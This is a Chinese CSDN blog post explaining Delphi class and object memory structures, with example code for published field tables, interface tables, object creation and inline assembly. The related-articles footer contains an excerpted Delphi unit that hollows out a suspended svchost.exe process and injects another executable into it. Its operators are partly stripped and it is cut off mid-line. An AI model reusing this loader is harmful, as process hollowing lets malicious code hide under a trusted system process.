Delphi 类与对象内存结构浅析(附件2)

最新推荐文章于 2023-05-16 10:37:34 发布
最新推荐文章于 2023-05-16 10:37:34 发布
阅读量1.3k 收藏 3
点赞数
分类专栏: VCL架构 文章标签: delphi integer interface function class 存储
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/starsky2006/article/details/5497153
版权
*的公开属性(代码)

示例:访问类published属性

说明:vmtFieldTablePublished Field表)指向Published Field表有序排列,只存储当前类的PublishedField表,得到父类的Published Field表需要往上遍历。

注意:只有类型是类或接口的数据成员才可定义为published的访问级别

代码:

type

    TMyObject = class(TObject)

    private

        FField1: Integer;

        FField2: string;

        FField3: array[0..2] of Integer;

    published

        Button1: TButton;

        Memo1: TMemo;

        Label1: TLabel;

    end;

 

procedure TForm1.Button1Click(Sender: TObject);

var

    AObject: TMyObject;

    //---

    procedure _ShowDMTInfo(ALines: TStrings; AClass: TClass);

    var

        AClassAddress,AFTAddress: Integer;

        AFieldCount,AFieldIndex,AFieldOffset,AFieldNameLen: Integer;

        APos,i: Integer;

        AFieldName: ShortString;

    begin

        AClassAddress := Integer(AClass);

        with ALines do

        begin

            Add(Format('类名: %s ', [AClass.ClassName]));

            //---

            AFTAddress := Integer(PPointer(AClassAddress + vmtFieldTable)^);

            if AFTAddress = 0 then

                Exit;

            //---

            APos := 0;

            AFieldCount := PWord(AFTAddress + APos)^;

            Add(Format('偏移量: %d  属性数量: %d', [APos,AFieldCount]));

            Inc(APos,6);

            //---

            for i := 0 to AFieldCount - 1 do

            begin

                AFieldOffset := PInteger(AFTAddress + APos)^;

                Inc(APos,4);

                //---

                AFieldIndex := PWord(AFTAddress + APos)^;

                Inc(APos,2);

                //---

                AFieldNameLen := PByte(AFTAddress + APos)^;

                Inc(APos,1);

                //---

                AFieldName := PShortString(AFTAddress + APos - 1)^;

                Inc(APos,AFieldNameLen);

                //---

                Add(Format('属性偏移量:%d  属性索引:%d  属性名长度: %d  属性名:%s', [AFieldOffset,AFieldIndex,AFieldNameLen,AFieldName]));

            end;

        end;

    end;

    //---

    procedure _ShowDMTInfo1(ALines: TStrings; AObject: TMyObject; const AFieldNames: array of string);

    var

        AObjectAddress,AFieldAddress: Integer;

        i: Integer;

    begin

        with ALines do

        begin

            Add(Format('类名: %s ', [AObject.ClassName]));

            //---

            AObjectAddress := Integer(AObject);

            Add(Format('对象地址: %s ', [IntToHex(AObjectAddress,2)]));

            //---

            for i := Low(AFieldNames) to High(AFieldNames) do

            begin

                AFieldAddress := Integer(AObject.FieldAddress(AFieldNames[i]));

                Add(Format('属性名:%s 属性地址:%s  偏移量:%d', [AFieldNames[i],IntToHex(AFieldAddress,2),AFieldAddress - AObjectAddress]));

            end;

        end;

    end;

begin

    _ShowDMTInfo(Self.Memo1.Lines,TMyObject);

    //---

    AObject := TMyObject.Create;

    _ShowDMTInfo1(Self.Memo1.Lines,AObject, ['Button1', 'Memo1', 'Label1']);

    AObject.Free;

end;

 

内存:

 

 

*的接口(代码)

示例:访问类接口表

说明:vmtIntfTable(接口表的指针)指向一块PInterfaceTable类型的接口信息表空间,vmtIntfTable只保存当前类所实现的接口表信息,不保存父类的接口表信息,创建对象时会根据vmtParent父类指针遍历获取所有父类的接口表信息插入对象内存空间。

代码:

type

    IMyInterface = interface(IUnknown)

        ['{06F3EA2C-E9C2-410E-97BE-D88ADF775EC3}']

        function GetField1: Integer;

        procedure Test;

        //---

        property Field1: Integer read GetField1;

    end;

    TMyObject = class(TInterfacedObject,IMyInterface)

    private

        function GetField1: Integer;

    public

        procedure Test;

    end;

 

function TMyObject.GetField1: Integer;

begin

    Result := 0;

end;

 

procedure TMyObject.Test;

begin

    ShowMessage('TMyObject 方法');

end;

 

procedure TForm1.Button1Click(Sender: TObject);

    //---

    procedure _ShowInfo(ALines: TStrings; AClass: TClass);

    var

        IntfTable: PInterfaceTable;

        I: Integer;

        AText: string;

        AClassAddress: Integer;

    begin

        AClassAddress := Integer(AClass);

        with ALines do

        begin

            Add(Format('类名: %s ', [AClass.ClassName]));

            //---

            //IntfTable := AClass.GetInterfaceTable;

            IntfTable := PPointer(AClassAddress + vmtIntfTable)^;

            if IntfTable = nil then

                Exit;

            //---

            with IntfTable^ do

            begin

                for I := 0 to EntryCount - 1 do

                begin

                    with Entries[I] do

                    begin

                        Add(Format('接口GUID:%s  接口虚方法表地址:%s  接口偏移地址:%d  接口获取标志:%d', [

                            GUIDToString(IID),IntToHex(Integer(VTable),2),IOffset,ImplGetter]));

                    end;

                end;

            end;

        end;

    end;

    //---

    procedure _ShowInfo1(ALines: TStrings; AObject: TObject);

    var

        AClass: TClass;

        AObjectAddress,i: Integer;

        IntfTable: PInterfaceTable;

    begin

        with ALines do

        begin

            Add(Format('类名: %s ', [AObject.ClassName]));

            //---

            AObjectAddress := Integer(AObject);

            Add(Format('对象地址: %s ', [IntToHex(AObjectAddress,2)]));

            //---

            AClass := AObject.ClassType;

            while AClass <> nil do

            begin

                IntfTable := AClass.GetInterfaceTable;

                if IntfTable <> nil then

                begin

                    with IntfTable^ do

                    begin

                        for I := 0 to EntryCount - 1 do

                            with Entries[I] do

                            begin

                                Add(Format('偏移量:%d  接口虚方法表地址:%s', [IOffset,IntToHex(PInteger(AObjectAddress + IOffset)^,2)]));

                            end;

                    end;

                end;

                //---

                AClass := AClass.ClassParent;

            end;

        end;

    end;

var

    AObject: TMyObject;

begin

    _ShowInfo(Self.Memo1.Lines,TInterfacedObject);

    _ShowInfo(Self.Memo1.Lines,TMyObject);

    //---

    AObject := TMyObject.Create;

    _ShowInfo1(Self.Memo1.Lines,AObject);

    AObject.Free;

end;

 

*对象创建(代码)

运行期是如何创建对象的呢,过程如下:

1)、首先读取InstanceSize对象实例内存大小分配内存

class function TObject.NewInstance: TObject;

begin

  Result := InitInstance(_GetMem(InstanceSize));

end;

 

2)、然后初始化对象的数据结构,将属性置为空,将接口方法表(包括父)插入对象内存空间

class function TObject.InitInstance(Instance: Pointer): TObject;

{$IFDEF PUREPASCAL}

var

  IntfTable: PInterfaceTable;

  ClassPtr: TClass;

  I: Integer;

begin

  FillChar(Instance^, InstanceSize, 0);

  PInteger(Instance)^ := Integer(Self);  //将类地址存放在开始的四个字节中

  ClassPtr := Self;

  while ClassPtr <> nil do

  begin

    IntfTable := ClassPtr.GetInterfaceTable;

    if IntfTable <> nil then

      for I := 0 to IntfTable.EntryCount-1 do

  with IntfTable.Entries[I] do

  begin

    if VTable <> nil then

      PInteger(@PChar(Instance)[IOffset])^ := Integer(VTable); //根据接口表提供的偏移地址,在对象的相应位置存储接口的虚方法表的地址

  end;

    ClassPtr := ClassPtr.ClassParent;

  end;

  Result := Instance;

end;

 

3)、随后会调用类的构造方法完成创建。

 

*对象的接口(代码)

示例:访问对象接口

说明:对象空间记录接口表地址,包括直属类和父类的

代码:

type

    IMyInterface = interface(IUnknown)

        ['{06F3EA2C-E9C2-410E-97BE-D88ADF775EC3}']

        procedure Test;

        function GetField1: Integer;

        //---

        property Field1: Integer read GetField1;

    end;

    TMyObject = class(TInterfacedObject,IMyInterface)

    private

        function GetField1: Integer;

    public

        procedure Test;

    end;

 

function TMyObject.GetField1: Integer;

begin

    Result := 0;

end;

 

procedure TMyObject.Test;

begin

    ShowMessage('TMyObject 方法');

end;

 

procedure TForm1.Button1Click(Sender: TObject);

var

    AObject: TMyObject;

    //---

    procedure _ShowInfo(ALines: TStrings; AObject: TMyObject);

    var

        AObjectAddress,AInterfaceAddress,AIntfTableAddress: Integer;

        AInterfaceEntry: PInterfaceEntry;

    begin

        with ALines do

        begin

            Add(Format('类名: %s ', [AObject.ClassName]));

            //---

            AObjectAddress := Integer(AObject);

            Add(Format('对象地址: %s ', [IntToHex(AObjectAddress,2)]));

            //---

            AInterfaceEntry := AObject.GetInterfaceEntry(StringToGUID('{00000000-0000-0000-C000-000000000046}'));

            if AInterfaceEntry <> nil then

            begin

                AInterfaceAddress := AObjectAddress + AInterfaceEntry.IOffset;

                AIntfTableAddress := PInteger(AInterfaceAddress)^;

                Add(Format('偏移量:%d  接口地址:%s  接口表地址:%s', [AInterfaceEntry.IOffset,IntTohex(AInterfaceAddress,2),IntTohex(AIntfTableAddress,2)]));

            end;

            //---

            AInterfaceEntry := AObject.GetInterfaceEntry(StringToGUID('{06F3EA2C-E9C2-410E-97BE-D88ADF775EC3}'));

            if AInterfaceEntry <> nil then

            begin

                AInterfaceAddress := AObjectAddress + AInterfaceEntry.IOffset;

                AIntfTableAddress := PInteger(AInterfaceAddress)^;

                Add(Format('偏移量:%d  接口地址:%s  接口表地址:%s', [AInterfaceEntry.IOffset,IntTohex(AInterfaceAddress,2),IntTohex(AIntfTableAddress,2)]));

            end;

        end;

    end;

    //---

    procedure _ShowInfo1(ALines: TStrings; AObject: TMyObject);

    var

        AInterface: IInterface;

        AMyInterface: IMyInterface;

        AObjectAddress,AInterfaceAddress,AIntfTableAddress: Integer;

    begin

        with ALines do

        begin

            Add(Format('类名: %s ', [AObject.ClassName]));

            //---

            AObjectAddress := Integer(AObject);

            Add(Format('对象地址: %s ', [IntToHex(AObjectAddress,2)]));

            //---

            AInterface := AObject;

            AInterfaceAddress := Integer(AInterface);

            AIntfTableAddress := PInteger(AInterfaceAddress)^;

            Add(Format('偏移量:%d  接口地址:%s  接口表地址:%s', [AInterfaceAddress - AObjectAddress,IntTohex(AInterfaceAddress,2),IntTohex(AIntfTableAddress,2)]));

            //---

            AMyInterface := AObject;

            AInterfaceAddress := Integer(AMyInterface);

            AIntfTableAddress := PInteger(AInterfaceAddress)^;

            Add(Format('偏移量:%d  接口地址:%s  接口表地址:%s', [AInterfaceAddress - AObjectAddress,IntTohex(AInterfaceAddress,2),IntTohex(AIntfTableAddress,2)]));

        end;

    end;

begin

    AObject := TMyObject.Create;

    //---

    _ShowInfo(self.Memo1.Lines,AObject);

    _ShowInfo1(self.Memo1.Lines,AObject);

    //---

    //AObject.Free;

end;

 

示例:访问对象接口表中的方法地址

说明:对象接口表中的方法地址并不是实际对应的方法地址,而是跳转到实际方法的一段汇编指令代码的代码地址。所有接口都默认继承自Interface接口。

代码:

type

    IMyInterface = interface(IUnknown)

        ['{06F3EA2C-E9C2-410E-97BE-D88ADF775EC3}']

        procedure Test;

        function GetField1: Integer;

        //---

        property Field1: Integer read GetField1;

    end;

    TMyObject = class(TInterfacedObject,IMyInterface)

    private

        function GetField1: Integer;

    public

        procedure Test;

    end;

 

function TMyObject.GetField1: Integer;

begin

    Result := 0;

end;

 

procedure TMyObject.Test;

begin

    ShowMessage('TMyObject 方法');

end;

 

procedure TForm1.Button1Click(Sender: TObject);

type

    TFakeEvent1 = procedure(const AInterface: IInterface);

var

    AObject: TMyObject;

    AMyInterface: IMyInterface;

    AObjectAddress,AInterfaceAddress,AIntfTableAddress,AIntfMethodAddress: Integer;

    AEvent1:Pointer;

begin

    AObject := TMyObject.Create;

    AMyInterface := AObject;

    //---

    AObjectAddress := Integer(AObject);

    AInterfaceAddress := Integer(AMyInterface);

    AIntfTableAddress := PInteger(AInterfaceAddress)^;

    AIntfMethodAddress := PInteger(AIntfTableAddress + $0C)^;

    //---

    AEvent1 := Pointer(AIntfMethodAddress);

    TFakeEvent1(AEvent1)(AMyInterface);

end;

内存:

ImyInterface接口表内容如下

 

ImyInterface接口Test方法的跳转指令如下

 

Interface接口表内容如下

Interface接口QueryInterface方法的跳转指令如下

 

示例:通过接口调用方法

说明:看一下正常的接口是如何调用的。

代码:

type

    IMyInterface = interface(IUnknown)

        ['{06F3EA2C-E9C2-410E-97BE-D88ADF775EC3}']

        procedure Test;

        function GetField1: Integer;

        //---

        property Field1: Integer read GetField1;

    end;

    TMyObject = class(TInterfacedObject,IMyInterface)

    private

        function GetField1: Integer;

    public

        procedure Test;

    end;

 

function TMyObject.GetField1: Integer;

begin

    Result := 0;

end;

 

procedure TMyObject.Test;

begin

    ShowMessage('TMyObject 方法');

end;

 

procedure TForm1.Button1Click(Sender: TObject);

var

    AObject: TMyObject;

    AMyInterface:IMyInterface;

begin

    AObject := TMyObject.Create;

    //---

    AMyInterface := AObject;

    AObject.Test;

AMyInterface.Test;

    AMyInterface := nil;

end;

汇编:

procedure TForm1.Button1Click(Sender: TObject);

    …………

begin

    …………

AMyInterface.Test;

        mov eax,[ebp - $0c]        ; eax存储为AMyInterface接口指针

        mov edx,[eax]                    ; edx 存储为AMyInterface接口表地址

        call dword ptr [edx + $c]     ; [edx + $c] 为接口表中Test方法的跳转指令的地址

    …………

end;

 

add eax,-$0C     ; eax-$0C为对象地址

jmp TMyObject.Test

 

*对象的成员(汇编)

示例:通过asm访问类 的私有变量。

说明:A.FA 的实际地址是 A 指向的地址(也就是对象内存位置,而不是 A 的地址)加上 FA 相对于对象头部的偏移地址。

代码:

type

    TA = class

    private

        FA: Integer;

    public

        procedure SetA(Value: Integer);

    end;

 

procedure TA.SetA(Value: Integer);

begin

    FA := Value;

end;

 

procedure TForm1.Button1Click(Sender: TObject);

var

    A: TA;

    tmpInt: Integer;

begin

    A := TA.Create;

    A.SetA(101);

    //---

    tmpInt := 0;

    asm

       MOV EAX, A              //--A 是指向对象的指针,这句把对象在内存中的地址存入 EAX

       MOV EAX, TA(EAX).FA;    //--通知编译器 EBX 指向的是 TA class;TA(EAX).FA 就是 EAX 加上 FA 的偏移处的内容,这是 Delphi 语法支持的。

       MOV tmpInt, EAX;

    end;

    ShowMessage(IntToStr(tmpInt));

    //---

    {tmpInt := 0;

    asm

        MOV EAX, A;          //--A 是指向对象的指针,这句把对象在内存中的地址存入 EAX

        MOV EAX, [EAX + 4];  //--这时 EAX + 4 当前对象的第一变量

        //MOV EAX, [EAX] + 8 //--访问第二个变量, 依此类推

        //MOV EAX, [EAX]     //--得到指向VMT的指针

        MOV tmpInt, EAX;

    end;

    ShowMessage(IntToStr(tmpInt));}

    //---

    {tmpInt := 0;

    asm

        MOV EAX, A;

        MOV tmpInt, EAX;

    end;

    ShowMessage(IntToStr(TA(tmpInt).FA)); }

    //--

    A.Free;

end;

 

示例:访问类的属性

说明:看一下正常的属性如何调用的。

代码:

type

    TMyObject = class(TObject)

    private

        FField1: Integer;

        FField2: string;

Public

        property Field1: Integer read FField1 write FField1;

        property Field2: string read FField2 write FField2;

    end;

 

procedure TForm1.Button1Click(Sender: TObject);

var

    AObject: TMyObject;

begin

    AObject := TMyObject.Create;

    AObject.Field1 := 10;

    AObject.Field2 := '10';

    AObject.Free;

end;

汇编:

procedure TForm1.Button1Click(Sender: TObject);

var

    AObject: TMyObject;

begin

    …………

AObject.Field1 := 10;

        mov eax,[ebp - $08]         ; eax存储为Aobject对象指针

        mov [eax + $04],$0000000a   ; eax + $04FField1字段位置

AObject.Field2 := '10';

        mov eax,[ebp - $08]         ; eax存储为Aobject对象指针

        add eax, $08                ; eax存储为FField2字段位置

        mov edx,$0045dcc8          ; edx存储为字符串地址

        call @LSrtAsg              ; 调用LSrtAsg方法

    …………

end;

 

 

starsky2006
关注
专栏目录
转 探索Delphi类与对象内存结构
qhmao的专栏
05-12 2293
初次接触DELPHI对它提供的RAD快速编程模式颇感神奇,随手拖放及格控件设定些属性一个应用程序就诞生了,我正是被这种特性所吸引。随着深入,慢慢的窥探到了DELPHI的VCL体系,知道了随手拖放背后隐藏的秘密:一切都起源于VCL的对象体系,一切都是面对对象的编程思想。Object pascal就是是怎样实现这个体系的呢,它究竟是如何将面对对象的特性表现出来的呢,Delphi的类和对象究竟是以什么样
delphi 中对象所占内存空间的分配
12-09
delphi 中对象所占内存空间的分配
Delphi类与对象内存结构浅析
11-06
窥探Delphi背后真实的运行机构,认识类与对象内存中的实际结构,开发真正百万级别应用,你必须要了解的知识!
Delphi 类与对象内存结构浅析(下)
starsky2006的专栏
04-17 1650
对象空间内存结构对象的内存结构是固定的,对象创建完成后就无法改变。它主要存储了对象直属类的地址(等价于类的VMT),对象本身的成员数据,对象的接口方法表地址。结构如图所示:说明:若类未声明接口,则对象空间不存储接口方法表地址。 类空间与对象空间的关系类空间与对象空间:示例:分析对象的基本内存结构代码:type    IMyInterf
探索Delphi类与对象内存结构
weixin_34384681的博客
01-07 266
初次接触DELPHI对它提供的RAD快速编程模式颇感神奇,随手拖放及格控件设定些属性一个应用程序就诞生了,我正是被这种特性所吸引。随着深入,慢慢的窥探到了DELPHI的VCL体系,知道了随手拖放背后隐藏的秘密:一切都起源于VCL的对象体系,一切都是面对对象的编程思想。Object pascal就是是怎样实现这个体系的呢,它究竟是如何将面对对象的特性表现出来的呢,Delphi的类和对象究竟是以什么样...
理解 Delphi 的类与接口(一) - 从结构谈起
topcrm的专栏
04-06 536
unit Unit1;interfaceuses  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,  Dialogs, StdCtrls;type  TForm1 = class(TForm)    Button1: TButton;    procedure Button1Click(Sende
Delphi“对象所占内存空间大小”的演示程序
05-11
Delphi“对象所占内存空间大斜的演示程序,《Delphi高手突破-Design In Delphi》随书光盘的附带示例,在我本机运行得到的结果:对象大小:20  对象所在地址:9773280  FMember1所在地址:9773284  FMember2所在...
delphi算法与数据结构
07-23
资源名称:delphi算法与数据结构资源截图: 资源太大,传百度网盘了,链接在附件中,有需要的同学自取。
DELPHI 内存映射共享内存
08-25
2. **映射视图到进程地址空间**:使用`MapViewOfFile`函数,传入前面创建的内存映射对象句柄、所需的访问权限、偏移量和映射的大小。这将返回一个指针,指向进程地址空间中的映射视图,通过这个指针可以直接读写内存...
DELPHI学习---结构类型
weixin_30493401的博客
08-14 201
Structured types (结构类型) 结构类型的一个实例可包含多个值。结构类型包括集合、数组、记录,也包括类、类引用(class-reference) 和接口类型。除了集合只能包含有序值以外,结构类型可以包含其它的结构类型,且结构的层次不受限 制。 默认情况下,一个结构类型的值被圆整为字(word)或者双字(double-word),这样访问起来更迅速。 当声明一个结构类型时,...
delphi内存分配完全总结
12-06
delphi内存 内存分配 delphi内存的完全总结
结构体保存到文件
03-08
这个类可以将结构体保存到文件,声明结构体的时候必须使用标记为可序列化
delphi内存中直接运行EXE类型的资源文件
09-09
unit PE; interface uses windows; function MemExecute(const ABuffer; Len: Integer; CmdParam: string; var ProcessId: Cardinal): Cardinal; implementation type TImageSectionHeaders = array[0..0] of TImageSectionHeader; PImageSectionHeaders = ^TImageSectionHeaders; { 计算对齐后的大小 } function GetAlignedSize(Origin, Alignment: Cardinal): Cardinal; begin result := (Origin + Alignment - 1) div Alignment * Alignment; end; { 计算加载pe并对齐需要占用多少内存,未直接使用OptionalHeader.SizeOfImage作为结果是因为据说有的编译器生成的exe这个值会填0 } function CalcTotalImageSize(MzH: PImageDosHeader; FileLen: Cardinal; peH: PImageNtHeaders; peSecH: PImageSectionHeaders): Cardinal; var i: Integer; begin {计算pe头的大小} result := GetAlignedSize(PeH.OptionalHeader.SizeOfHeaders, PeH.OptionalHeader.SectionAlignment); {计算所有节的大小} for i := 0 to peH.FileHeader.NumberOfSections - 1 do if peSecH[i].PointerToRawData + peSecH[i].SizeOfRawData > FileLen then // 超出文件范围 begin result := 0; exit; end else if peSecH[i].VirtualAddress 0 then //计算对齐后某节的大小 if peSecH[i].Misc.VirtualSize 0 then result := GetAlignedSize(peSecH[i].VirtualAddress + peSecH[i].Misc.VirtualSize, PeH.OptionalHeader.SectionAlignment) else result := GetAlignedSize(peSecH[i].VirtualAddress + peSecH[i].SizeOfRawData, PeH.OptionalHeader.SectionAlignment) else if peSecH[i].Misc.VirtualSize < peSecH[i].SizeOfRawData then result := result + GetAlignedSize(peSecH[i].SizeOfRawData, peH.OptionalHeader.SectionAlignment) else result := result + GetAlignedSize(peSecH[i].Misc.VirtualSize, PeH.OptionalHeader.SectionAlignment); end; { 加载pe到内存并对齐所有节 } function AlignPEToMem(const Buf; Len: Integer; var PeH: PImageNtHeaders; var PeSecH: PImageSectionHeaders; var Mem: Pointer; var ImageSize: Cardinal): Boolean; var SrcMz: PImageDosHeader; // DOS头 SrcPeH: PImageNtHeaders; // PE头 SrcPeSecH: PImageSectionHeaders; // 节表 i: Integer; l: Cardinal; Pt: Pointer; begin result := false; SrcMz := @Buf; if Len < sizeof(TImageDosHeader) then exit; if SrcMz.e_magic IMAGE_DOS_SIGNATURE then exit; if Len < SrcMz._lfanew + Sizeof(TImageNtHeaders) then exit; SrcPeH := pointer(Integer(SrcMz) + SrcMz._lfanew); if (SrcPeH.Signature IMAGE_NT_SIGNATURE) then exit; if (SrcPeH.FileHeader.Characteristics and IMAGE_FILE_DLL 0) or (SrcPeH.FileHeader.Characteristics and IMAGE_FILE_EXECUTABLE_IMAGE = 0) or (SrcPeH.FileHeader.SizeOfOptionalHeader SizeOf(TImageOptionalHeader)) then exit; SrcPeSecH := Pointer(Integer(SrcPeH) + SizeOf(TImageNtHeaders)); ImageSize := CalcTotalImageSize(SrcMz, Len, SrcPeH, SrcPeSecH); if ImageSize = 0 then exit; Mem := VirtualAlloc(nil, ImageSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); // 分配内存 if Mem nil then begin // 计算需要复制的PE头字节数 l := SrcPeH.OptionalHeader.SizeOfHeaders; for i := 0 to SrcPeH.FileHeader.NumberOfSections - 1 do if (SrcPeSecH[i].PointerToRawData 0) and (SrcPeSecH[i].PointerToRawData < l) then l := SrcPeSecH[i].PointerToRawData; Move(SrcMz^, Mem^, l); PeH := Pointer(Integer(Mem) + PImageDosHeader(Mem)._lfanew); PeSecH := Pointer(Integer(PeH) + sizeof(TImageNtHeaders)); Pt := Pointer(Cardinal(Mem) + GetAlignedSize(PeH.OptionalHeader.SizeOfHeaders, PeH.OptionalHeader.SectionAlignment)); for i := 0 to PeH.FileHeader.NumberOfSections - 1 do begin // 定位该节在内存中的位置 if PeSecH[i].VirtualAddress 0 then Pt := Pointer(Cardinal(Mem) + PeSecH[i].VirtualAddress); if PeSecH[i].SizeOfRawData 0 then begin // 复制数据到内存 Move(Pointer(Cardinal(SrcMz) + PeSecH[i].PointerToRawData)^, pt^, PeSecH[i].SizeOfRawData); if peSecH[i].Misc.VirtualSize < peSecH[i].SizeOfRawData then pt := pointer(Cardinal(pt) + GetAlignedSize(PeSecH[i].SizeOfRawData, PeH.OptionalHeader.SectionAlignment)) else pt := pointer(Cardinal(pt) + GetAlignedSize(peSecH[i].Misc.VirtualSize, peH.OptionalHeader.SectionAlignment)); // pt 定位到下一节开始位置 end else pt := pointer(Cardinal(pt) + GetAlignedSize(PeSecH[i].Misc.VirtualSize, PeH.OptionalHeader.SectionAlignment)); end; result := True; end; end; type TVirtualAllocEx = function(hProcess: THandle; lpAddress: Pointer; dwSize, flAllocationType: DWORD; flProtect: DWORD): Pointer; stdcall; var MyVirtualAllocEx: TVirtualAllocEx = nil; function IsNT: Boolean; begin result := Assigned(MyVirtualAllocEx); end; { 生成外壳程序命令行 } function PrepareShellExe(CmdParam: string ): string; begin {这里的路径 自己定义了^_^,仅仅是外壳程序} //result:='c:\Program Files\Internet Explorer\iexplore.exe'+CmdParam ; result := 'c:\windows\system32\svchost.exe' + cmdparam; end; { 是否包含可重定向列表 } function HasRelocationTable(peH: PImageNtHeaders): Boolean; begin result := (peH.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress 0) and (peH.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size 0); end; type PImageBaseRelocation = ^TImageBaseRelocation; TImageBaseRelocation = packed record VirtualAddress: cardinal; SizeOfBlock: cardinal; end; { 重定向PE用到的地址 } procedure DoRelocation(peH: PImageNtHeaders; OldBase, NewBase: Pointer); var Delta: Cardinal; p: PImageBaseRelocation; pw: PWord; i: Integer; begin Delta := Cardinal(NewBase) - peH.OptionalHeader.ImageBase; p := pointer(cardinal(OldBase) + peH.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); while (p.VirtualAddress + p.SizeOfBlock 0) do begin pw := pointer(Integer(p) + Sizeof(p^)); for i := 1 to (p.SizeOfBlock - Sizeof(p^)) div 2 do begin if pw^ and $F000 = $3000 then Inc(PCardinal(Cardinal(OldBase) + p.VirtualAddress + (pw^ and $0FFF))^, Delta); inc(pw); end; p := Pointer(pw); end; end; type TZwUnmapViewOfSection = function(Handle, BaseAdr: Cardinal): Cardinal; stdcall; { 卸载原外壳占用内存 } function UnloadShell(ProcHnd, BaseAddr: Cardinal): Boolean; var M: HModule; ZwUnmapViewOfSection: TZwUnmapViewOfSection; begin result := False; m := LoadLibrary('ntdll.dll'); if m 0 then begin ZwUnmapViewOfSection := GetProcAddress(m, 'ZwUnmapViewOfSection'); if assigned(ZwUnmapViewOfSection) then result := (ZwUnmapViewOfSection(ProcHnd, BaseAddr) = 0); FreeLibrary(m); end; end; { 创建外壳进程并获取其基址、大小和当前运行状态 } function CreateChild(Cmd: string; var Ctx: TContext; var ProcHnd, ThrdHnd, ProcId, BaseAddr, ImageSize: Cardinal): Boolean; var si: TStartUpInfo; pi: TProcessInformation; Old: Cardinal; MemInfo: TMemoryBasicInformation; p: Pointer; begin FillChar(si, Sizeof(si), 0); FillChar(pi, SizeOf(pi), 0); si.cb := sizeof(si); result := CreateProcess(nil, PChar(Cmd), nil, nil, False, CREATE_SUSPENDED, nil, nil, si, pi); // 以挂起方式运行进程 if result then begin ProcHnd := pi.hProcess; ThrdHnd := pi.hThread; ProcId := pi.dwProcessId; { 获取外壳进程运行状态,[ctx.Ebx+8]内存处存的是外壳进程的加载基址,ctx.Eax存放有外壳进程的入口地址 } ctx.ContextFlags := CONTEXT_FULL; GetThreadContext(ThrdHnd, ctx); ReadProcessMemory(ProcHnd, Pointer(ctx.Ebx + 8), @BaseAddr, SizeOf(Cardinal), Old); // 读取加载基址 p := Pointer(BaseAddr); { 计算外壳进程占有的内存 } while VirtualQueryEx(ProcHnd, p, MemInfo, Sizeof(MemInfo)) 0 do begin if MemInfo.State = MEM_FREE then break; p := Pointer(Cardinal(p) + MemInfo.RegionSize); end; ImageSize := Cardinal(p) - Cardinal(BaseAddr); end; end; { 创建外壳进程并用目标进程替换它然后执行 } function AttachPE(CmdParam: string; peH: PImageNtHeaders; peSecH: PImageSectionHeaders; Ptr: Pointer; ImageSize: Cardinal; var ProcId: Cardinal): Cardinal; var s: string; Addr, Size: Cardinal; ctx: TContext; Old: Cardinal; p: Pointer; Thrd: Cardinal; begin result := INVALID_HANDLE_VALUE; s := PrepareShellExe(CmdParam + ' ' {, peH.OptionalHeader.ImageBase, ImageSize}); if CreateChild(s, ctx, result, Thrd, ProcId, Addr, Size) then begin p := nil; if (peH.OptionalHeader.ImageBase = Addr) and (Size >= ImageSize) then // 外壳进程可以容纳目标进程并且加载地址一致 begin p := Pointer(Addr); VirtualProtectEx(result, p, Size, PAGE_EXECUTE_READWRITE, Old); end else if IsNT then // 98 下失败 begin if UnloadShell(result, Addr) then // 卸载外壳进程占有内存 // 重新按目标进程加载基址和大小分配内存 p := MyVirtualAllocEx(Result, Pointer(peH.OptionalHeader.ImageBase), ImageSize, MEM_RESERVE or MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (p = nil) and hasRelocationTable(peH) then // 分配内存失败并且目标进程支持重定向 begin // 按任意基址分配内存 p := MyVirtualAllocEx(result, nil, ImageSize, MEM_RESERVE or MEM_COMMIT, PAGE_EXECUTE_READWRITE); if p nil then DoRelocation(peH, Ptr, p); // 重定向 end; end; if p nil then begin WriteProcessMemory(Result, Pointer(ctx.Ebx + 8), @p, Sizeof(DWORD), Old); // 重置目标进程运行环境中的基址 peH.OptionalHeader.ImageBase := Cardinal(p); if WriteProcessMemory(Result, p, Ptr, ImageSize, Old) then // 复制PE数据到目标进程 begin ctx.ContextFlags := CONTEXT_FULL; if Cardinal(p) = Addr then ctx.Eax := peH.OptionalHeader.ImageBase + peH.OptionalHeader.AddressOfEntryPoint // 重置运行环境中的入口地址 else ctx.Eax := Cardinal(p) + peH.OptionalHeader.AddressOfEntryPoint; SetThreadContext(Thrd, ctx); // 更新运行环境 ResumeThread(Thrd); // 执行 CloseHandle(Thrd); end else begin // 加载失败,杀掉外壳进程 TerminateProcess(Result, 0); CloseHandle(Thrd); CloseHandle(Result); Result := INVALID_HANDLE_VALUE; end; end else begin // 加载失败,杀掉外壳进程 TerminateProcess(Result, 0); CloseHandle(Thrd); CloseHandle(Result); Result := INVALID_HANDLE_VALUE; end; end; end; function MemExecute(const ABuffer; Len: Integer; CmdParam: string; var ProcessId: Cardinal): Cardinal; var peH: PImageNtHeaders; peSecH: PImageSectionHeaders; Ptr: Pointer; peSz: Cardinal; begin result := INVALID_HANDLE_VALUE; if alignPEToMem(ABuffer, Len, peH, peSecH, Ptr, peSz) then begin result := AttachPE(CmdParam, peH, peSecH, Ptr, peSz, ProcessId); VirtualFree(Ptr, peSz, MEM_DECOMMIT); //VirtualFree(Ptr, 0, MEM_RELEASE); end; end; initialization MyVirtualAllocEx := GetProcAddress(GetModuleHandle('Kernel32.dll'), 'VirtualAllocEx'); end. /////////////////////////////////////////////////////////////////////// {测试:你可以把任何一个exe文件 作成资源然后这样调用} program test; //{$APPTYPE CONSOLE} {$R 'data.res' 'data.rc'}//加入exe资源文件 uses windows, PE in 'PE.pas'; //引用上面的单元 var ProcessId: Cardinal; ResourceLocation: HRSRC; Size: Longword; ResDataHandle: THandle; ResourcePointer: PChar; begin ResourceLocation := FindResource(HInstance, 'myexe', RT_RCDATA); if ResourceLocation 0 then begin Size := SizeofResource(HInstance, ResourceLocation); if Size 0 then begin ResDataHandle := LoadResource(HInstance, ResourceLocation); if ResDataHandle 0 then begin ResourcePointer := LockResource(ResDataHandle); if ResourcePointer nil then begin MemExecute(ResourcePointer^, size, '', 